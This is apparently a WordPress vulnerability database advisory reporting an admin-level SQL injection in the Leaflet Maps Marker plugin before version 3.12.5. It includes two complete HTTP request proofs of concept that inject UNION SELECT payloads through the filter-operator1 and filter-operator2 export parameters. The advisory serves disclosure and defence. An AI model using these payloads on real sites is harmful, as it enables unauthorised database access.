WordPress Plugin Vulnerabilities
Leaflet Maps Marker < 3.12.5 - Admin+ SQLi
Description
The plugin does not properly sanitize some parameters before inserting them into SQL queries. As a result, high privilege users could perform SQL injection attacks.
Proof of Concept
PoC for filter-operator1 parameter: POST /wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 HTTP/1.1 Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 476 Origin: http://127.0.0.1:8000 Connection: close Referer: http://127.0.0.1:8000/wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 Cookie: [admin+] Upgrade-Insecure-Requests: 1 action_standalone=export&filter-layer=select-all&limit-from=0&limit-to=100&filter-markername=_NOT_FOUND_&filter-operator1=)+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+&filter-popuptext=1&filter-exclude-markername=&filter-operator2=AND&filter-exclude-popuptext=&filter-icon=icon-any&export-format=csv&caching-method=auto&caching-discisam-directory=&caching-phptemp-filesize=8&submit=start+export ====== PoC for filter-operator2 parameter: POST /wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 HTTP/1.1 Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 474 Origin: http://127.0.0.1:8000 Connection: close Referer: http://127.0.0.1:8000/wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 Cookie: [admin+] Upgrade-Insecure-Requests: 1 action_standalone=export&filter-layer=select-all&limit-from=0&limit-to=100&filter-markername=&filter-operator1=&filter-popuptext=1&filter-exclude-markername=1&filter-operator2=)+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+&filter-exclude-popuptext=_NOT_FOUND_&filter-icon=icon-any&export-format=csv&caching-method=auto&caching-discisam-directory=&caching-phptemp-filesize=8&submit=start+export
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Ihor Bliumental
Submitter
Ihor Bliumental
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-08-08 (about 1 years ago)
Added
2022-08-08 (about 1 years ago)
Last Updated
2023-05-05 (about 1 years ago)